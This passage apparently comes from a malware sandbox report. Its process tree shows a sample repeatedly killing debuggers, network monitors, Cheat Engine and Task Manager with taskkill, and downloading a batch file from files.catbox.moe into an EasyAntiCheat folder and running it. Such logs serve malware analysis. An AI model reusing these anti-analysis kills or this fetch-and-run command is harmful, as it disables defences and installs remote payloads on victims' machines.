    - Suspicious use of AdjustPrivilegeToken
    PID:2956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3884
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:4980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:2388
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:2692
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:4972
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:396
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:632
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:1464
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:3868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:4460
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:3488
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:3000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:3964
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:2032
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:736
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:4996
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:3688
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:3948
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:4628
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:1076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:4480
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3360
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:1504
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:3972
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1596
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2128
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4860
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:1952
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:8
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:768
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:2300
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:2492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:1436
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:4444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:3720
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:3244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4216
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4040
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:1396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2412
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:1380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:5088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Cerber
    PID:4392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1620
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Cerber
    PID:1692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2616
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    PID:4520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1140
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    PID:4104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:4628
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:4480
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:3360
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Kills process with taskkill
    PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:4308
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    PID:1840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:1920
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:3272
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    PID:1916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:2548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    - Kills process with taskkill
    PID:4616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:3220
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    PID:4048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:4648
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:3656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:5000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:2300
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    - Kills process with taskkill
    PID:2764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4420
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    PID:1436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:3244
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Kills process with taskkill
    PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:3000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:4216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:1396
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:2032
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:2964
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Cerber
    PID:2312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:412
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:3664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:2920
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:2212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3068
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Cerber
    PID:1620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:4520
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Cerber
    PID:2616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:3948
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2096
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3884
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4700
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:1896
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:1840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:1052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Kills process with taskkill
    PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:3020
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Cerber
    PID:1416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:4860
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:1688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:3440
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    - Kills process with taskkill
    PID:632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4548
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:1432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1028
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4932
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:4636
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Kills process with taskkill
    PID:3504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:2432
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:4652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3416
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4880
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:3584
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Cerber
    PID:4044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:3368
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Cerber
    PID:880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -o "C:\Program Files (x86)\EasyAntiCheat_EOS\gvi5ia.bat" https://files.catbox.moe/gvi5ia.bat
  2⤵
  PID:412
- - C:\Windows\system32\curl.exe
    curl -o "C:\Program Files (x86)\EasyAntiCheat_EOS\gvi5ia.bat" https://files.catbox.moe/gvi5ia.bat
    3⤵
    - Drops file in Program Files directory
    PID:2920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:1832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:3068
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:4052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:2180
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Cerber
    PID:1140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:4316
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Cerber
    PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:1192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:3884
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Cerber
    PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:4700
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Cerber
    PID:1348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:1896
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Cerber
    PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:1052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    - Kills process with taskkill
    PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:1916
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /c ""C:\Program Files (x86)\EasyAntiCheat_EOS\gvi5ia.bat
  2⤵
  PID:2224
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Program Files (x86)\EasyAntiCheat_EOS\gvi5ia.bat
    3⤵
    PID:60
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:4012
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    PID:4648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1032
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Kills process with taskkill
    PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:1028
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Cerber
    PID:820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:392
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    PID:5092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:1516
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    PID:4216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:3800
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:1852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:4172
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Kills process with taskkill
    PID:3092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:624
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:1380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    PID:736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:3368
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    PID:3120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:972
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:640
- - C:\Windows\system32\taskkill.exe
